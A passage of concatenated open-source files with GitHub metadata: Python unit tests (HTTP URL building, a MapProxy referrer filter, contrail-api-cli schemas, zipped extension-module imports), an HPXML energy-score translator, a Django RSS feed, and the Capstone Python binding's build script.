conn.API_BASE_URL,
'storage',
conn.API_VERSION,
'foo',
])
self.assertEqual(conn.build_api_url('/foo'), URI)
def test_build_api_url_w_extra_query_params(self):
from six.moves.urllib.parse import parse_qsl
from six.moves.urllib.parse import urlsplit
conn = self._make_one(object())
uri = conn.build_api_url('/foo', {'bar': 'baz'})
scheme, netloc, path, qs, _ = urlsplit(uri)
self.assertEqual('%s://%s' % (scheme, netloc), conn.API_BASE_URL)
self.assertEqual(path,
'/'.join(['', 'storage', conn.API_VERSION, 'foo']))
parms = dict(parse_qsl(qs))
self.assertEqual(parms['bar'], 'baz')
| {
"content_hash": "52f6808289aabbb38604715ad1bf6880",
"timestamp": "",
"source": "github",
"line_count": 68,
"max_line_length": 76,
"avg_line_length": 32.88235294117647,
"alnum_prop": 0.5670840787119857,
"repo_name": "dstrockis/outlook-autocategories",
"id": "cb9344a16389b6d47c261f7626aa1e133347ff42",
"size": "2812",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "lib/unit_tests/test__http.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "39286"
},
{
"name": "CSS",
"bytes": "6267"
},
{
"name": "HTML",
"bytes": "449"
},
{
"name": "JavaScript",
"bytes": "6187"
},
{
"name": "Jupyter Notebook",
"bytes": "163002"
},
{
"name": "Python",
"bytes": "11957653"
},
{
"name": "Shell",
"bytes": "423"
}
],
"symlink_target": ""
} |
from webtest import TestApp
from mapproxy.response import Response
from mapproxy.security.referrer import ReferrerFilter, NONE, SELF, REGEX
DENIED=404
class CheckApp(object):
def __init__(self):
self._called = False
def __call__(self, environ, start_response):
self._called = True
return Response('')(environ, start_response)
@property
def called(self):
result = self._called
self._called = False
return result
class TestReferrerFilter(object):
def setup(self):
self.check_app = CheckApp()
def test_no_referrer(self):
app = TestApp(ReferrerFilter(self.check_app))
app.get('/')
assert self.check_app.called
def test_none(self):
app = TestApp(ReferrerFilter(self.check_app, [NONE]))
app.get('/')
assert self.check_app.called
app.get('/', headers={'Referer': 'http://localhost/'}, status=DENIED)
assert not self.check_app.called
def test_string(self):
referrer_filter = ['http://omniscale.de/', 'http://localhost/']
for referrer, allowed in (('http://localhost/bar', True),
('http://localhost:5050/bar', False),
('http://omniscale.net', False)):
yield self.check_referrer, referrer_filter, referrer, allowed
def test_self(self):
referrer_filter = [SELF]
for referrer, allowed in ((None, False),
('http://localhost:80/', True),
('http://localhost/bar', True),
('http:/localhost:5050/', False)):
yield self.check_referrer, referrer_filter, referrer, allowed
def test_regex(self):
referrer_filter = [REGEX('http://([ab]\.)?osm/')]
for referrer, allowed in (
(None, False),
('http://osm/', True),
('http://a.osm/', True),
('http://b.osm/', True),
('http://c.osm/', False),
):
yield self.check_referrer, referrer_filter, referrer, allowed
def check_referrer(self, filter, referrer_header, allowed):
app = TestApp(ReferrerFilter(self.check_app, filter))
headers = {}
if referrer_header:
headers['Referer'] = referrer_header
status = None
if not allowed:
status = DENIED
app.get('/', headers=headers, status=status)
if allowed:
assert self.check_app.called
else:
assert not self.check_app.called
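# The test_* methods above that yield (check_referrer, filter, referrer,
# allowed) tuples are nose-style generator tests: each yielded tuple is
# collected and run as its own test case.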
| {
"content_hash": "71dbf0cc8ab7bd1b23749ffa1c1cc459",
"timestamp": "",
"source": "github",
"line_count": 85,
"max_line_length": 77,
"avg_line_length": 31.49411764705882,
"alnum_prop": 0.5353007097497199,
"repo_name": "Anderson0026/mapproxy",
"id": "f863a8bd79f9cc66515416935abddcf2f3d436d3",
"size": "3324",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mapproxy/test/unit/test_referrer.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "12401"
},
{
"name": "Python",
"bytes": "1477825"
},
{
"name": "Shell",
"bytes": "3087"
}
],
"symlink_target": ""
} |
from .base import HPXMLtoHEScoreTranslatorBase
from .exceptions import TranslationError
def convert_to_type(type_, value):
if value is None:
return value
else:
return type_(value)
class HPXML2toHEScoreTranslator(HPXMLtoHEScoreTranslatorBase):
SCHEMA_DIR = 'hpxml-2.3.0'
def check_hpwes(self, p, v3_b):
if p is not None:
return self.xpath(p, 'h:ProjectDetails/h:ProgramCertificate="Home Performance with Energy Star"')
def sort_foundations(self, fnd, v3_b):
# Sort the foundations from largest area to smallest
def get_fnd_area(fnd):
return max([self.xpath(fnd, 'sum(h:%s/h:Area)' % x) for x in ('Slab', 'FrameFloor')])
fnd.sort(key=get_fnd_area, reverse=True)
return fnd, get_fnd_area
def get_foundation_walls(self, fnd, v3_b):
foundationwalls = self.xpath(fnd, 'h:FoundationWall', aslist=True)
return foundationwalls
def get_foundation_slabs(self, fnd, v3_b):
slabs = self.xpath(fnd, 'h:Slab', raise_err=True, aslist=True)
return slabs
def get_foundation_frame_floors(self, fnd, v3_b):
frame_floors = self.xpath(fnd, 'h:FrameFloor', aslist=True)
return frame_floors
def attic_has_rigid_sheathing(self, attic, v3_roof):
return self.xpath(attic,
'boolean(h:AtticRoofInsulation/h:Layer[h:NominalRValue > 0][h:InstallationType="continuous"][boolean(h:InsulationMaterial/h:Rigid)])' # noqa: E501
)
def every_wall_layer_has_nominal_rvalue(self, wall):
# This variable will be true if every wall layer has a NominalRValue *or*
# if there are no insulation layers
wall_layers = self.xpath(wall, 'h:Insulation/h:Layer', aslist=True)
every_layer_has_nominal_rvalue = True # Considered to have nominal R-value unless assembly R-value is used
if wall_layers:
for layer in wall_layers:
if self.xpath(layer, 'h:NominalRValue') is None:
every_layer_has_nominal_rvalue = False
break
elif self.xpath(wall, 'h:Insulation/h:AssemblyEffectiveRValue/text()') is not None:
every_layer_has_nominal_rvalue = False
return every_layer_has_nominal_rvalue
def get_attic_roof_rvalue(self, attic, v3_roof):
# if there is no nominal R-value, it will return 0
return self.xpath(attic, 'sum(h:AtticRoofInsulation/h:Layer/h:NominalRValue)')
def get_attic_roof_assembly_rvalue(self, attic, v3_roof):
# if there is no assembly effective R-value, it will return None
return convert_to_type(float, self.xpath(attic, 'h:AtticRoofInsulation/h:AssemblyEffectiveRValue/text()'))
def every_attic_roof_layer_has_nominal_rvalue(self, attic, v3_roof):
roof_layers = self.xpath(attic, 'h:AtticRoofInsulation/h:Layer', aslist=True)
every_layer_has_nominal_rvalue = True # Considered to have nominal R-value unless assembly R-value is used
if roof_layers:
for layer in roof_layers:
if self.xpath(layer, 'h:NominalRValue') is None:
every_layer_has_nominal_rvalue = False
break
elif self.xpath(attic, 'h:AtticRoofInsulation/h:AssemblyEffectiveRValue/text()') is not None:
every_layer_has_nominal_rvalue = False
return every_layer_has_nominal_rvalue
def get_attic_knee_walls(self, attic):
knee_walls = []
b = self.xpath(attic, 'ancestor::h:Building')
for kneewall_idref in self.xpath(attic, 'h:AtticKneeWall/@idref', aslist=True):
wall = self.xpath(
b,
'descendant::h:Wall[h:SystemIdentifier/@id=$kneewallid]',
raise_err=True,
kneewallid=kneewall_idref
)
knee_walls.append(wall)
return knee_walls
def get_attic_type(self, attic, atticid):
hpxml_attic_type = self.xpath(attic, 'h:AtticType/text()')
rooftypemap = {'cape cod': 'cath_ceiling',
'cathedral ceiling': 'cath_ceiling',
'flat roof': 'cath_ceiling',
'unvented attic': 'vented_attic',
'vented attic': 'vented_attic',
'venting unknown attic': 'vented_attic',
'other': None}
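        # 'other' (and any attic type missing from the map) yields None and is
        # rejected below, since there is no HEScore rooftype to translate it to.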
if rooftypemap.get(hpxml_attic_type) is None:
raise TranslationError(
'Attic {}: Cannot translate HPXML AtticType {} to HEScore rooftype.'.format(atticid,
hpxml_attic_type))
return rooftypemap[hpxml_attic_type]
def get_attic_floor_rvalue(self, attic, v3_b):
return self.xpath(attic, 'sum(h:AtticFloorInsulation/h:Layer/h:NominalRValue)')
def get_attic_floor_assembly_rvalue(self, attic, v3_b):
return convert_to_type(float, self.xpath(attic, 'h:AtticFloorInsulation/h:AssemblyEffectiveRValue/text()'))
def every_attic_floor_layer_has_nominal_rvalue(self, attic, v3_b):
frame_floor_layers = self.xpath(attic, 'h:AtticFloorInsulation/h:Layer', aslist=True)
every_layer_has_nominal_rvalue = True # Considered to have nominal R-value unless assembly R-value is used
if frame_floor_layers:
for layer in frame_floor_layers:
if self.xpath(layer, 'h:NominalRValue') is None:
every_layer_has_nominal_rvalue = False
break
elif self.xpath(attic, 'h:AtticFloorInsulation/h:AssemblyEffectiveRValue/text()') is not None:
every_layer_has_nominal_rvalue = False
return every_layer_has_nominal_rvalue
def get_ceiling_area(self, attic):
return float(self.xpath(attic, 'h:Area/text()', raise_err=True))
def get_attic_roof_area(self, roof):
return float(self.xpath(roof, 'h:RoofArea/text()', raise_err=True))
def get_framefloor_assembly_rvalue(self, framefloor, v3_framefloor):
return convert_to_type(float, self.xpath(framefloor, 'h:Insulation/h:AssemblyEffectiveRValue/text()'))
def get_foundation_wall_assembly_rvalue(self, fwall, v3_fwall):
return convert_to_type(float, self.xpath(fwall, 'h:Insulation/h:AssemblyEffectiveRValue/text()'))
def get_slab_assembly_rvalue(self, slab, v3_slab):
return convert_to_type(float, self.xpath(slab, 'h:PerimeterInsulation/h:AssemblyEffectiveRValue/text()'))
def every_framefloor_layer_has_nominal_rvalue(self, framefloor, v3_framefloor):
framefloor_layers = self.xpath(framefloor, 'h:Insulation/h:Layer', aslist=True)
every_layer_has_nominal_rvalue = True # Considered to have nominal R-value unless assembly R-value is used
if framefloor_layers:
for layer in framefloor_layers:
if self.xpath(layer, 'h:NominalRValue') is None:
every_layer_has_nominal_rvalue = False
break
elif self.xpath(framefloor, 'h:Insulation/h:AssemblyEffectiveRValue/text()') is not None:
every_layer_has_nominal_rvalue = False
return every_layer_has_nominal_rvalue
def get_solarscreen(self, wndw_skylight):
return bool(self.xpath(wndw_skylight, 'h:Treatments/text()') == 'solar screen'
or self.xpath(wndw_skylight, 'h:ExteriorShading/text()') == 'solar screens')
def get_hescore_walls(self, b):
return self.xpath(
b, 'h:BuildingDetails/h:Enclosure/h:Walls/h:Wall\
[((h:ExteriorAdjacentTo="ambient" and not(contains(h:ExteriorAdjacentTo, "garage"))) or\
not(h:ExteriorAdjacentTo)) and not(contains(h:InteriorAdjacentTo, "attic"))]', # noqa: E501
aslist=True)
def check_is_doublepane(self, v3_window, glass_layers):
return glass_layers in ('double-pane', 'single-paned with storms', 'single-paned with low-e storms')
def check_is_storm_lowe(self, window, glass_layers):
return glass_layers == 'single-paned with low-e storms'
def get_duct_location(self, hpxml_duct_location, v3_bldg):
return self.duct_location_map[hpxml_duct_location]
duct_location_map = {'conditioned space': 'cond_space',
'unconditioned space': None,
'unconditioned basement': 'uncond_basement',
'unvented crawlspace': 'unvented_crawl',
'vented crawlspace': 'vented_crawl',
'crawlspace': None,
'unconditioned attic': 'uncond_attic',
'interstitial space': None,
'garage': 'unvented_crawl',
'outside': 'outside'}
| {
"content_hash": "dc2daaeaa4074d787d8e487dc2b8e308",
"timestamp": "",
"source": "github",
"line_count": 186,
"max_line_length": 173,
"avg_line_length": 47.61827956989247,
"alnum_prop": 0.618606751721802,
"repo_name": "NREL/hescore-hpxml",
"id": "4b247126b45494cc9204f2b40bbcb4ce8ff7c20c",
"size": "8857",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hescorehpxml/hpxml2.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "401857"
}
],
"symlink_target": ""
} |
import glob
import os
import shutil
import stat
import sys
from distutils import log
from distutils import dir_util
from distutils.command.build_clib import build_clib
from setuptools.command.sdist import sdist
from setuptools import setup
from distutils.sysconfig import get_python_lib
# prebuilt libraries for Windows - for sdist
PATH_LIB64 = "prebuilt/win64/capstone.dll"
PATH_LIB32 = "prebuilt/win32/capstone.dll"
# package name can be 'capstone' or 'capstone-windows'
PKG_NAME = 'capstone'
if os.path.exists(PATH_LIB64) and os.path.exists(PATH_LIB32):
PKG_NAME = 'capstone-windows'
SYSTEM = sys.platform
VERSION = '4.0'
# virtualenv breaks import, but get_python_lib() will work.
SITE_PACKAGES = os.path.join(get_python_lib(), "capstone")
if "--user" in sys.argv:
try:
from site import getusersitepackages
SITE_PACKAGES = os.path.join(getusersitepackages(), "capstone")
except ImportError:
pass
# adapted from commit e504b81 of Nguyen Tan Cong
# Reference: https://docs.python.org/2/library/platform.html#cross-platform
is_64bits = sys.maxsize > 2**32
def copy_sources():
"""Copy the C sources into the source directory.
This rearranges the source files under the python distribution
directory.
"""
src = []
try:
dir_util.remove_tree("src/")
except (IOError, OSError):
pass
dir_util.copy_tree("../../arch", "src/arch/")
dir_util.copy_tree("../../include", "src/include/")
if SYSTEM == "win32":
dir_util.copy_tree("../../msvc/headers", "src/msvc/headers")
src.extend(glob.glob("../../*.[ch]"))
src.extend(glob.glob("../../*.mk"))
src.extend(glob.glob("../../Makefile"))
src.extend(glob.glob("../../LICENSE*"))
src.extend(glob.glob("../../README"))
src.extend(glob.glob("../../*.TXT"))
src.extend(glob.glob("../../RELEASE_NOTES"))
src.extend(glob.glob("../../make.sh"))
src.extend(glob.glob("../../CMakeLists.txt"))
for filename in src:
outpath = os.path.join("./src/", os.path.basename(filename))
log.info("%s -> %s" % (filename, outpath))
shutil.copy(filename, outpath)
class custom_sdist(sdist):
"""Reshuffle files for distribution."""
def run(self):
for filename in (glob.glob("capstone/*.dll")
+ glob.glob("capstone/*.so")
+ glob.glob("capstone/*.dylib")):
try:
os.unlink(filename)
except Exception:
pass
# if prebuilt libraries are existent, then do not copy source
if os.path.exists(PATH_LIB64) and os.path.exists(PATH_LIB32):
return sdist.run(self)
copy_sources()
return sdist.run(self)
class custom_build_clib(build_clib):
"""Customized build_clib command."""
def run(self):
log.info('running custom_build_clib')
build_clib.run(self)
def finalize_options(self):
# We want build-clib to default to build-lib as defined by the "build"
# command. This is so the compiled library will be put in the right
        # place alongside the python code.
self.set_undefined_options('build',
('build_lib', 'build_clib'),
('build_temp', 'build_temp'),
('compiler', 'compiler'),
('debug', 'debug'),
('force', 'force'))
build_clib.finalize_options(self)
def build_libraries(self, libraries):
if SYSTEM in ("win32", "cygwin"):
# if Windows prebuilt library is available, then include it
if is_64bits and os.path.exists(PATH_LIB64):
shutil.copy(PATH_LIB64, "capstone")
return
elif os.path.exists(PATH_LIB32):
shutil.copy(PATH_LIB32, "capstone")
return
# build library from source if src/ is existent
if not os.path.exists('src'):
return
for (lib_name, build_info) in libraries:
log.info("building '%s' library", lib_name)
os.chdir("src")
            # platform descriptions are listed at https://docs.python.org/2/library/sys.html#sys.platform
if SYSTEM == "win32":
# Windows build: this process requires few things:
# - CMake + MSVC installed
# - Run this command in an environment setup for MSVC
os.mkdir("build")
os.chdir("build")
# Do not build tests & static library
os.system('cmake -DCMAKE_BUILD_TYPE=RELEASE -DCAPSTONE_BUILD_TESTS=0 -DCAPSTONE_BUILD_STATIC=0 -G "NMake Makefiles" ..')
os.system("nmake")
os.chdir("..")
so = "src/build/capstone.dll"
elif SYSTEM == "cygwin":
os.chmod("make.sh", stat.S_IREAD|stat.S_IEXEC)
if is_64bits:
os.system("CAPSTONE_BUILD_CORE_ONLY=yes ./make.sh cygwin-mingw64")
else:
os.system("CAPSTONE_BUILD_CORE_ONLY=yes ./make.sh cygwin-mingw32")
so = "src/capstone.dll"
else: # Unix
os.chmod("make.sh", stat.S_IREAD|stat.S_IEXEC)
os.system("CAPSTONE_BUILD_CORE_ONLY=yes ./make.sh")
if SYSTEM == "darwin":
so = "src/libcapstone.dylib"
else: # Non-OSX
so = "src/libcapstone.so"
os.chdir("..")
shutil.copy(so, "capstone")
def dummy_src():
return []
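# Note: the 'sources' list for the library is intentionally empty; the
# custom_build_clib command above builds the capstone library via cmake/nmake
# or make.sh rather than letting distutils compile any C files.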
setup(
provides=['capstone'],
packages=['capstone'],
name=PKG_NAME,
version=VERSION,
author='Nguyen Anh Quynh',
author_email='[email protected]',
description='Capstone disassembly engine',
url='http://www.capstone-engine.org',
classifiers=[
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
requires=['ctypes'],
cmdclass=dict(
build_clib=custom_build_clib,
sdist=custom_sdist,
),
libraries=[(
'capstone', dict(
package='capstone',
sources=dummy_src()
),
)],
zip_safe=False,
include_package_data=True,
package_data={
"capstone": ["*.so", "*.dll", "*.dylib"],
}
)
| {
"content_hash": "bb922c237bd190374e5c77abee1ce34e",
"timestamp": "",
"source": "github",
"line_count": 199,
"max_line_length": 136,
"avg_line_length": 32.5929648241206,
"alnum_prop": 0.5630588960838729,
"repo_name": "fvrmatteo/capstone",
"id": "cf8cd2b0ecf74fb444f39da7893b3065ab228c1b",
"size": "6508",
"binary": false,
"copies": "3",
"ref": "refs/heads/next",
"path": "bindings/python/setup.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "13762"
},
{
"name": "C",
"bytes": "1354617"
},
{
"name": "C#",
"bytes": "552697"
},
{
"name": "C++",
"bytes": "11484385"
},
{
"name": "CMake",
"bytes": "14440"
},
{
"name": "Java",
"bytes": "437026"
},
{
"name": "Makefile",
"bytes": "38875"
},
{
"name": "OCaml",
"bytes": "250989"
},
{
"name": "POV-Ray SDL",
"bytes": "11871203"
},
{
"name": "Python",
"bytes": "396342"
},
{
"name": "Ruby",
"bytes": "1193"
},
{
"name": "Shell",
"bytes": "7693"
},
{
"name": "Smalltalk",
"bytes": "302401"
},
{
"name": "Tcl",
"bytes": "1339"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals
import unittest
try:
import mock
except ImportError:
import unittest.mock as mock
import contrail_api_cli.schema as schema
from contrail_api_cli.context import Context
from contrail_api_cli.resource import Resource, LinkedResources, LinkType, Collection
BASE = "http://localhost:8082"
class TestSchema(unittest.TestCase):
def test_load_non_existing_version(self):
non_existing_version = "0"
with self.assertRaises(schema.SchemaVersionNotAvailable):
schema.create_schema_from_version(non_existing_version)
def test_create_all_schema_versions(self):
for v in schema.list_available_schema_version():
schema.create_schema_from_version(v)
class TestLinkResource(unittest.TestCase):
def setUp(self):
Context().schema = schema.create_schema_from_version('2.21')
def tearDown(self):
Context().schema = None
@mock.patch('contrail_api_cli.resource.Context.session')
def test_attr_transformations(self, mock_session):
lr = LinkedResources(LinkType.REF,
Resource('virtual-machine-interface', fq_name='foo'))
self.assertEqual(lr._type_to_attr('virtual-machine'), 'virtual_machine_refs')
self.assertEqual(lr._type_to_attr('virtual_machine'), 'virtual_machine_refs')
self.assertEqual(lr._attr_to_type('virtual_machine'), 'virtual-machine')
self.assertEqual(lr._attr_to_type('virtual_machine_refs'), 'virtual-machine')
self.assertEqual(lr._attr_to_type('virtual_machine_back_refs'), 'virtual-machine-back')
lr = LinkedResources(LinkType.BACK_REF,
Resource('virtual-machine-interface', fq_name='foo'))
self.assertEqual(lr._type_to_attr('virtual-machine'), 'virtual_machine_back_refs')
self.assertEqual(lr._attr_to_type('virtual_machine_back_refs'), 'virtual-machine')
self.assertEqual(lr._attr_to_type('virtual_machine_refs'), 'virtual-machine-refs')
lr = LinkedResources(LinkType.CHILDREN,
Resource('virtual-machine-interface', fq_name='foo'))
self.assertEqual(lr._type_to_attr('virtual-machine'), 'virtual_machines')
self.assertEqual(lr._attr_to_type('virtual_machines'), 'virtual-machine')
self.assertEqual(lr._attr_to_type('virtual_machine_refs'), 'virtual-machine-ref')
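        # The convention exercised above: REF links map to '<type>_refs',
        # BACK_REF links to '<type>_back_refs', and CHILDREN simply pluralize
        # the underscored type name.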
@mock.patch('contrail_api_cli.resource.Context.session')
def test_schema_refs(self, mock_session):
mock_session.get_json.return_value = {
"virtual-machine-interface": {
"href": BASE + "/virtual-machine-interface/ec1afeaa-8930-43b0-a60a-939f23a50724",
"uuid": "ec1afeaa-8930-43b0-a60a-939f23a50724",
"attr": None,
"fq_name": [
"virtual-machine-interface",
"ec1afeaa-8930-43b0-a60a-939f23a50724"
],
"bar_refs": [1, 2, 3],
"virtual_machine_refs": [
{
"href": BASE + "/virtual-machine/15315402-8a21-4116-aeaa-b6a77dceb191",
"uuid": "15315402-8a21-4116-aeaa-b6a77dceb191",
"to": [
"bar",
"15315402-8a21-4116-aeaa-b6a77dceb191"
]
}
]
}
}
vmi = Resource('virtual-machine-interface', uuid='ec1afeaa-8930-43b0-a60a-939f23a50724', fetch=True)
self.assertEqual(len(vmi.refs.virtual_machine), 1)
self.assertTrue(type(vmi.refs.virtual_machine[0]) == Resource)
self.assertEqual(len(vmi.refs.bar), 0)
self.assertEqual([r.uuid for r in vmi.refs], ['15315402-8a21-4116-aeaa-b6a77dceb191'])
@mock.patch('contrail_api_cli.resource.Context.session')
def test_schema_children(self, mock_session):
mock_session.get_json.side_effect = [
{
"project": {
"href": BASE + "/project/ec1afeaa-8930-43b0-a60a-939f23a50724",
"uuid": "ec1afeaa-8930-43b0-a60a-939f23a50724",
"attr": None,
"fq_name": [
"project",
"ec1afeaa-8930-43b0-a60a-939f23a50724"
],
"virtual_networks": [
{
"href": BASE + "/virtual-network/15315402-8a21-4116-aeaa-b6a77dceb191",
"uuid": "15315402-8a21-4116-aeaa-b6a77dceb191",
"to": [
"virtual-network",
"15315402-8a21-4116-aeaa-b6a77dceb191"
]
}
]
}
},
{
'virtual-network': []
}
]
vmi = Resource('project', uuid='ec1afeaa-8930-43b0-a60a-939f23a50724', fetch=True)
self.assertEqual(len(vmi.children.virtual_network), 1)
self.assertEqual(type(vmi.children.virtual_network), Collection)
        self.assertEqual(vmi.children.virtual_network.type, 'virtual-network')
        self.assertEqual(vmi.children.virtual_network.parent_uuid, vmi.uuid)
vmi.children.virtual_network.fetch()
mock_session.get_json.assert_called_with(vmi.children.virtual_network.href, parent_id=vmi.uuid)
@mock.patch('contrail_api_cli.resource.Context.session')
def test_schema_back_refs(self, mock_session):
mock_session.get_json.side_effect = [
{
"virtual-network": {
"href": BASE + "/virtual-network/ec1afeaa-8930-43b0-a60a-939f23a50724",
"uuid": "ec1afeaa-8930-43b0-a60a-939f23a50724",
"attr": None,
"fq_name": [
"virtual-network",
"ec1afeaa-8930-43b0-a60a-939f23a50724"
],
"instance_ip_back_refs": [
{
"href": BASE + "/instance-ip/15315402-8a21-4116-aeaa-b6a77dceb191",
"uuid": "15315402-8a21-4116-aeaa-b6a77dceb191",
"to": [
"instance-ip",
"15315402-8a21-4116-aeaa-b6a77dceb191"
]
}
]
}
},
{
'instance-ip': []
}
]
vn = Resource('virtual-network', uuid='ec1afeaa-8930-43b0-a60a-939f23a50724', fetch=True)
self.assertEqual(len(vn.back_refs.instance_ip), 1)
self.assertEqual(type(vn.back_refs.instance_ip), Collection)
        self.assertEqual(vn.back_refs.instance_ip.type, 'instance-ip')
        self.assertEqual(vn.back_refs.instance_ip.back_refs_uuid, vn.uuid)
vn.back_refs.instance_ip.fetch()
mock_session.get_json.assert_called_with(vn.back_refs.instance_ip.href, back_ref_id=vn.uuid)
def test_require_schema(self):
@schema.require_schema(version='> 3')
def test_gt():
pass
@schema.require_schema(version='< 3')
def test_lt():
pass
@schema.require_schema(version='2.21')
def test_eq():
pass
with self.assertRaises(schema.SchemaError):
test_gt()
test_lt()
test_eq()
if __name__ == "__main__":
unittest.main()
| {
"content_hash": "217cd190b58b461fd2cb03a8a9094d62",
"timestamp": "",
"source": "github",
"line_count": 181,
"max_line_length": 108,
"avg_line_length": 42.027624309392266,
"alnum_prop": 0.546601814118575,
"repo_name": "eonpatapon/contrail-api-cli",
"id": "ba0105cdad80c6390ba5e5f077f3588d98610d77",
"size": "7631",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "contrail_api_cli/tests/test_schema.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "208774"
}
],
"symlink_target": ""
} |
from django.contrib.syndication.views import Feed
from articles.models import ArticleTranslation
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import get_language
from django.conf import settings
import datetime
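# A hypothetical URLconf hook-up (not part of this module); the captured
# ``language`` kwarg is what get_object() below receives:
#   url(r'^articles/feed/(?P<language>[a-z]{2})/$', ArticleFeed(), name='articles_feed')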
class ArticleFeed(Feed):
title = hasattr(settings, 'ARTICLES_RSS_TITLE') and settings.ARTICLES_RSS_TITLE or _("RSS Title")
description = hasattr(settings, 'ARTICLES_RSS_DESCRIPTION') and settings.ARTICLES_RSS_DESCRIPTION or ""
# hard coded to prevent circular imports
link = '/articles/'
def get_object(self, request, language):
return ArticleTranslation.objects.filter(published=True, publication_date__lte=datetime.datetime.now(), language=language or get_language()[:2])
def items(self, obj):
return obj.order_by('-publication_date')[:10]
def item_title(self, item):
return item.title
def item_description(self, item):
return item.content
def item_pubdate(self, item):
        return datetime.datetime.combine(item.publication_date, datetime.time())
 | {
"content_hash": "b29861bb27dae89e40b59ace73be38d6",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 150,
"avg_line_length": 39.142857142857146,
"alnum_prop": 0.7235401459854015,
"repo_name": "platypus-creation/django-articles",
"id": "577e1ce11e54f5bde151a77558ad7af8c0545c5a",
"size": "1096",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "articles/feeds.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "113"
},
{
"name": "Perl",
"bytes": "1085"
},
{
"name": "Python",
"bytes": "64733"
}
],
"symlink_target": ""
} |
"""Tests for `pydzipimport`."""
#-----------------------------------------------------------------------------
# Copyright (C) 2012 Bradley Froehle <[email protected]>
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
import imp
import os
import sys
import unittest
import tempfile
import zipfile
from distutils.command.build_ext import build_ext
from distutils.core import Distribution
from distutils.extension import Extension
import pydzipimport
# The filename extension for compiled extension modules.
SO_EXT = [suffix[0] for suffix in imp.get_suffixes()
if suffix[2] == imp.C_EXTENSION][0]
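# (e.g. '.pyd' on Windows, or a version-tagged '.so' suffix on Linux and macOS)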
def prepare_sample_zip(file):
"""Create a zipfile which contains the `sample` package.
On completion, the contents of `file` will be::
sample/
sample/one.py
sample/__init__.<SO_EXT>
sample/two.<SO_EXT>
The extension modules are compiled in a temporary directory.
"""
src = os.path.join(os.path.dirname(__file__), 'sample')
zf = zipfile.ZipFile(file, mode='w')
# Is there an easier way to make an empty directory in the zipfile???
with tempfile.TemporaryDirectory() as td:
zf.write(td, 'sample')
zf.write(os.path.join(src, 'one.py'),
os.path.join('sample', 'one.py'))
with tempfile.TemporaryDirectory() as td:
## Build the extension modules.
## This is more or less the same as running::
## python setup.py build_ext --force
## for the following `setup.py` script::
#
# from distutils.core import setup
# from distutils.extension import Extension
#
# setup(
# packages = ['test_pydzipimport'],
# ext_modules = [
# Extension("sample.__init__", ["sample/__init__.c"]),
# Extension("sample.two", ["sample/two.c"]),
# ],
# )
b = build_ext(Distribution())
b.force = True
b.finalize_options()
b.extensions = [
Extension('sample.__init__', [os.path.join(src, '__init__.c')]),
Extension('sample.two', [os.path.join(src, 'two.c')]),
]
b.build_temp = td
b.build_lib = td
b.run()
zf.write(b.get_ext_fullpath('sample.__init__'),
os.path.join('sample', '__init__' + SO_EXT))
zf.write(b.get_ext_fullpath('sample.two'),
os.path.join('sample', 'two' + SO_EXT))
zf.close()
class TestPydZipImport(unittest.TestCase):
"""Test PydZipImport class."""
@classmethod
def setUpClass(cls):
cls.zf = os.path.join(os.path.dirname(__file__), 'sample.zip')
prepare_sample_zip(cls.zf)
def setUp(self):
self._old_sys_path = list(sys.path)
# Remove troublesome entries of sys.path:
for p in ('', os.path.dirname(__file__)):
if p in sys.path:
sys.path.remove(p)
pydzipimport.install()
def tearDown(self):
sys.path = self._old_sys_path
pydzipimport.uninstall()
def test_import_package(self):
"""Test importing a package in a zipfile."""
sys.path.insert(0, self.zf)
base = os.path.join(self.zf, 'sample')
# Test package (sample/__init__.<SO_EXT>):
import sample as s
if not hasattr(s, '__file__'):
self.fail('Unexpected implicit namespace package: %s' % s.__path__)
self.assertEqual(s.data, 'sample.__init__')
self.assertIsInstance(s.__loader__,
pydzipimport.TemporaryExtensionFileLoader)
self.assertEqual(s.__package__, 'sample')
self.assertEqual(s.__path__, [base])
self.assertEqual(s.__file__, os.path.join(base, '__init__' + SO_EXT))
# print(s.__loader__.data.name)
# Test source module (sample/one.py):
import sample.one
self.assertEqual(s.one.data, 'sample.one')
self.assertEqual(s.one.__package__, 'sample')
self.assertFalse(hasattr(s.one, '__path__'))
self.assertEqual(s.one.__file__, os.path.join(base, 'one.py'))
# Test extension module (sample/two.<SO_EXT>):
import sample.two
self.assertEqual(s.two.data, 'sample.two')
self.assertIsInstance(s.two.__loader__,
pydzipimport.TemporaryExtensionFileLoader)
self.assertEqual(s.two.__package__, 'sample')
self.assertFalse(hasattr(s.two, '__path__'))
self.assertEqual(s.two.__file__, os.path.join(base, 'two' + SO_EXT))
# print(s.two.__loader__.data.name)
def test_import_source_module(self):
"""Test importing a source module in a zipfile."""
base = os.path.join(self.zf, 'sample')
sys.path.insert(0, base)
import one
self.assertEqual(one.data, 'sample.one')
self.assertFalse(one.__package__)
self.assertEqual(one.__file__, os.path.join(base, 'one.py'))
def test_import_extension_module(self):
"""Test importing an extension module in a zipfile."""
base = os.path.join(self.zf, 'sample')
sys.path.insert(0, base)
import two
self.assertEqual(two.data, 'sample.two')
self.assertIsInstance(two.__loader__,
pydzipimport.TemporaryExtensionFileLoader)
self.assertFalse(two.__package__)
self.assertEqual(two.__file__, os.path.join(base, 'two' + SO_EXT))
# print(two.__loader__.data.name)
if __name__ == "__main__":
unittest.main()
| {
"content_hash": "103592dc1d4e19567768c05334052f84",
"timestamp": "",
"source": "github",
"line_count": 171,
"max_line_length": 79,
"avg_line_length": 33.432748538011694,
